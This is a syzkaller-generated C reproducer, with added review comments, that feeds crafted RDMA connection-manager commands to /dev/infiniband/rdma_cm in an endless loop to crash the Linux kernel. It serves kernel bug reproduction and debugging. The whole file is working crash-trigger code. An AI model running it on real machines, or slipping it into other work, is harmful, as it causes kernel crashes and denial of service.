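// https://syzkaller.appspot.com/bug?id=d4ac7bfeafac8a3d6d06123e078462ac765415e7
// autogenerated by syzkaller (http://github.com/google/syzkaller)
//
// Kernel-bug reproducer. It drives the RDMA connection-manager character
// device (/dev/infiniband/rdma_cm) with a fixed sequence of write()
// commands, forever. The intended outcome is a kernel crash or sanitizer
// splat, and the program never exits on its own: run it only inside a
// disposable VM, never on a machine you care about.
//
// NOTE(review): the header names were lost when this listing was rendered
// (the original shows five bare "#include" tokens). The set below is
// reconstructed from what the code actually uses: fixed-width integer types
// (stdint.h), memcpy/memset (string.h), syscall() (unistd.h) and the
// __NR_* numbers (sys/syscall.h). _GNU_SOURCE must precede unistd.h for
// syscall() to be declared.
#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

static void test(void);

/* Runs one reproduction attempt after another; reproduction relies on
 * repetition, so this never returns. */
void loop(void)
{
    for (;;)
        test();
}

/* Fallback for toolchains whose headers predate mlock2(). 325 is the
 * x86_64 syscall number; on any other architecture this fallback is wrong
 * and the mlock2() call below would hit an unrelated syscall. */
#ifndef __NR_mlock2
#define __NR_mlock2 325
#endif

/* Values carried from one syscall to the next within test():
 *   r[0] fd of /selinux/mls
 *   r[1] fd of /dev/infiniband/rdma_cm
 *   r[2] 32-bit id read back from the first rdma_cm command's response
 *   r[3] 32-bit id read back from the third rdma_cm command's response
 * The all-ones sentinels mean "not obtained"; passed as an fd they become
 * -1, so a failed open turns every dependent call into an EBADF no-op. */
uint64_t r[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffff,
                 0xffffffffffffffff};

/* One reproduction attempt. All pointers are absolute addresses inside the
 * 16 MiB region that main() maps at 0x20000000; the raw stores below
 * hand-build each kernel ABI structure at a fixed offset, exactly as the
 * generator emitted them (only runs of zero bytes were folded into memset).
 *
 * Every rdma_cm command written here starts with an 8-byte header laid out
 * as {u32 cmd; u16 in; u16 out;} followed by the command body. The cmd
 * values used are 0, 9, 0 and 3 — presumably create-id, reject, create-id
 * and resolve-ip in the ucma command set, but confirm against the
 * rdma_user_cm.h of the kernel tree under test before relying on that. */
void test(void)
{
    long res;

    /* Step 1: open /selinux/mls read-only (0xffffffffffffff9c is AT_FDCWD)
     * and issue ioctl 0x4068aea3 on it. The ioctl number encodes a
     * 0x68-byte "write" argument, which matches the buffer built at
     * 0x20000100..0x20000167. Whether this step contributes to the crash
     * is not evident from the reproducer; it is kept because the generator
     * kept it. Note r[0] is never closed, so after enough iterations the
     * openat() fails with EMFILE and the ioctl keeps targeting the last
     * descriptor that did open — left as generated, since closing it could
     * change the timing that triggers the bug. */
    memcpy((void*)0x200002c0, "/selinux/mls", 13);
    res = syscall(__NR_openat, 0xffffffffffffff9c, 0x200002c0, 0, 0);
    if (res != -1)
        r[0] = res;
    *(uint32_t*)0x20000100 = 0x7b;
    *(uint32_t*)0x20000104 = 0;
    *(uint64_t*)0x20000108 = 1;
    *(uint64_t*)0x20000110 = 7;
    *(uint64_t*)0x20000118 = 0x81;
    *(uint64_t*)0x20000120 = 0;
    memset((void*)0x20000128, 0, 0x40); /* bytes 0x20000128..0x20000167 */
    syscall(__NR_ioctl, r[0], 0x4068aea3, 0x20000100);

    /* Step 2: open the rdma_cm device read-write (flags 2) and write a
     * 32-byte command: cmd 0, in 0x18, out 0xfa00, then a body whose
     * response pointer is 0x20001b80. The 32-bit value the driver writes
     * into that response buffer becomes r[2]. The id is read back whenever
     * write() did not fail outright, even on a short write. */
    memcpy((void*)0x20000180, "/dev/infiniband/rdma_cm", 24);
    res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000180, 2, 0);
    if (res != -1)
        r[1] = res;
    *(uint32_t*)0x20001bc0 = 0;           /* cmd */
    *(uint16_t*)0x20001bc4 = 0x18;        /* in  */
    *(uint16_t*)0x20001bc6 = 0xfa00;      /* out */
    *(uint64_t*)0x20001bc8 = 1;
    *(uint64_t*)0x20001bd0 = 0x20001b80;  /* response buffer */
    *(uint16_t*)0x20001bd8 = 1;
    *(uint8_t*)0x20001bda = 6;
    memset((void*)0x20001bdb, 0, 5);      /* bytes 0x20001bdb..0x20001bdf */
    res = syscall(__NR_write, r[1], 0x20001bc0, 0x20);
    if (res != -1)
        r[2] = *(uint32_t*)0x20001b80;

    /* Locks the last 16 KiB of the fixed mapping with flags=1
     * (MLOCK_ONFAULT). Presumably a memory-pressure stressor left in by the
     * generator; its role in the crash is not visible here. */
    syscall(__NR_mlock2, 0x20ffc000, 0x4000, 1);

    /* Step 3: 0x110-byte command (cmd 9, in 0x108) referencing the id in
     * r[2]: a 32-bit id, a length byte of 0x40, three opaque bytes, then a
     * 256-byte blob of fuzzer-chosen private data. Every byte is preserved
     * verbatim — a reproducer must not be "cleaned up". */
    *(uint32_t*)0x20001c00 = 9;
    *(uint16_t*)0x20001c04 = 0x108;
    *(uint16_t*)0x20001c06 = 0xfa00;
    *(uint32_t*)0x20001c08 = r[2];
    *(uint8_t*)0x20001c0c = 0x40;
    memcpy((void*)0x20001c0d, "\xfd\xb9\xd6", 3);
    memcpy((void*)0x20001c10,
           "\xd2\x82\x4d\x69\xfe\xb2\x0a\x47\xac\x07\x67\xc2\x09\x00\x3c\xee\x3f"
           "\x97\x3e\x9e\x7f\x8c\xd2\x25\x09\xc8\x45\xa8\xbd\x5b\x39\xee\x45\x90"
           "\x24\x26\xc0\x8a\xf0\x43\x6d\x0d\xd0\x5c\x5f\x3a\xd9\x30\x88\x5d\x30"
           "\xcc\x8d\x43\x43\xdc\x13\x1f\xb6\x2a\xb0\xb6\xb4\x17\xa3\x5f\x96\xb7"
           "\x4a\x55\x6f\xec\x6c\x58\x55\xfc\xa9\xf8\xb6\x6e\x08\x0b\x3b\x72\x2f"
           "\x32\x99\x2f\x1b\xfb\xa8\x9d\xb5\x8a\x11\x04\xc5\xbe\x10\x23\x0e\xdb"
           "\xb5\x42\x0c\xb8\xe5\x5f\x1b\x60\xcd\x8f\x2f\x54\x7c\xb7\x15\x1b\xd9"
           "\xa1\x70\x02\x21\x77\xaa\xea\x5b\xa4\xe6\xb6\x0f\x26\x84\x18\x34\x55"
           "\x98\x65\x49\x45\xab\x0b\xd5\xa2\x47\xb2\x08\xe0\xd0\x70\xa2\xb7\xee"
           "\xcb\xe2\xb7\xda\x2f\xa3\x22\x31\x80\xcf\x01\x96\x4c\xcb\xdc\xf3\x09"
           "\x57\x3f\xd3\x95\xa9\xf8\xb0\x0a\xd3\x70\x28\x40\x03\xdb\xa6\x86\x3b"
           "\x34\x06\xf3\x98\xe3\xd4\x5e\xf8\x45\x10\xb1\x59\xdc\xa0\x13\x56\x3d"
           "\x77\x71\xcd\x4e\x73\xc5\x95\x3e\x37\x2e\xbd\xcc\x3c\x39\xa6\x14\xa8"
           "\x85\x14\xa2\xce\xa0\x9f\xb0\xe5\x9f\x00\x48\xbb\xa9\x46\x39\x97\x45"
           "\x66\xad\x70\x81\xc7\xb5\x5b\x3d\xc7\x3f\xc4\x47\x9b\xd0\x1e\xe1\xae"
           "\xa9",
           256);
    syscall(__NR_write, r[1], 0x20001c00, 0x110);

    /* Locks the final page of the fixed mapping; same caveat as above. */
    syscall(__NR_mlock, 0x20fff000, 0x1000);

    /* Step 4: a second cmd-0 request, same shape as step 2 but with
     * different body values and a response buffer at 0x20000080; the id
     * read back becomes r[3]. */
    *(uint32_t*)0x200000c0 = 0;
    *(uint16_t*)0x200000c4 = 0x18;
    *(uint16_t*)0x200000c6 = 0xfa00;
    *(uint64_t*)0x200000c8 = 3;
    *(uint64_t*)0x200000d0 = 0x20000080;
    *(uint16_t*)0x200000d8 = 2;
    memset((void*)0x200000da, 0, 6);      /* bytes 0x200000da..0x200000df */
    res = syscall(__NR_write, r[1], 0x200000c0, 0x20);
    if (res != -1)
        r[3] = *(uint32_t*)0x20000080;

    /* Step 5: 0x48-byte command (cmd 3, in 0x40) built from a literal that
     * carries two 28-byte blocks each starting with family byte 0x0a
     * (AF_INET6), followed by the id from r[3] and four trailing bytes. The
     * file descriptor is then closed; r[1] keeps the stale value until the
     * next iteration reopens the device. */
    memcpy((void*)0x200001c0,
           "\x03\x00\x00\x00\x40\x00\x00\xfa\x0a\x00\x00\x00\x00\x00\x00\x00\x00"
           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
           "\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\xff\x01\x00\x00\x00\x00\x00"
           "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00",
           64);
    *(uint32_t*)0x20000200 = r[3];
    memcpy((void*)0x20000204, "\xd1\x16\x00\x27", 4);
    syscall(__NR_write, r[1], 0x200001c0, 0x48);
    syscall(__NR_close, r[1]);
}

/* Entry point: establish the fixed scratch mapping, then loop forever.
 * prot 3 = PROT_READ|PROT_WRITE, flags 0x32 = MAP_PRIVATE|MAP_FIXED|
 * MAP_ANONYMOUS, 16 MiB at 0x20000000. If the mapping cannot be created
 * the absolute stores in test() would SIGSEGV, which is easy to mistake
 * for the kernel bug itself — so exit with a distinct status instead. */
int main(void)
{
    if (syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0) == -1)
        return 1;
    for (;;)
        loop();
}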